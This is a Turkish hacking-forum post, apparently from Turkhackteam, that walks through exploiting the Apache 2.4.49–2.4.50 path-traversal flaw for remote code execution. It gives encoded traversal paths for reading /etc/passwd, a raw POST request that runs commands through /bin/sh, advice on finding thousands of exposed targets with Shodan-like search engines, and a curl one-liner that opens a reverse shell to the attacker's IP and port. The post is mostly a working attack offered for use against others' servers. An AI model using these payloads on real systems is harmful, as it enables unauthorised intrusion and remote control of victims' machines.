Apache 2.4.49-50 LFİ to RCE

lyxG

Anka Team Junior
15 Ocak 2019
303
1
71
m9RCVr.png

Selamlar, bugün apache 2.4.49-50 arasında çalışan uygulamalar içerisinde bulduğunuz LFI zafieylerinizi rce ye çevireceğiz. Öncelikle hedef site üzerinde lfi aramak için /cgi-bin/ klasörü altına gelelim ve sırası ile ;

/cgi-bin/../../../../../etc/passwd
/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

Şeklinde taramalar yapacağız, lakin istekleri GET parametresinden ziyade POST isteği atlmalısınız. Buraya kadar herhangi bir sorun yok, eğer ki LFI zafiyetini bulduysanız şimdi ise request içinde şu şekilde denemeler yapın.

ZMm6


POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1

Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

Daha fazla bu sistemi kullanan hedefleri aramak istiyorsanız shodan, fofa, hunter, censys gibi alanlar işinizi görecektir, yaklaşık 10.000 den fazla bu yapıyı kullanan mimariyi karşınıza çıkarıp sistemlerde göre testler yapabilirsiniz. örneği burada bırakıyorum.

hcGS


Artık reverse shell almak için aşağıda verdiğim shell'i kendi ip ve portunuza göre düzenleyin, sisteminizde tünel yapamıyorsanız alternatif olarak localtonet adlı uygulamayı ücretsiz şekilde kullanabilirsiniz.


curl 'http://vuln.com/cgi-bin/../../../../../../../../../bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/ip/port0>&1' -H "Content-Type: text/plain"

gYgj
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.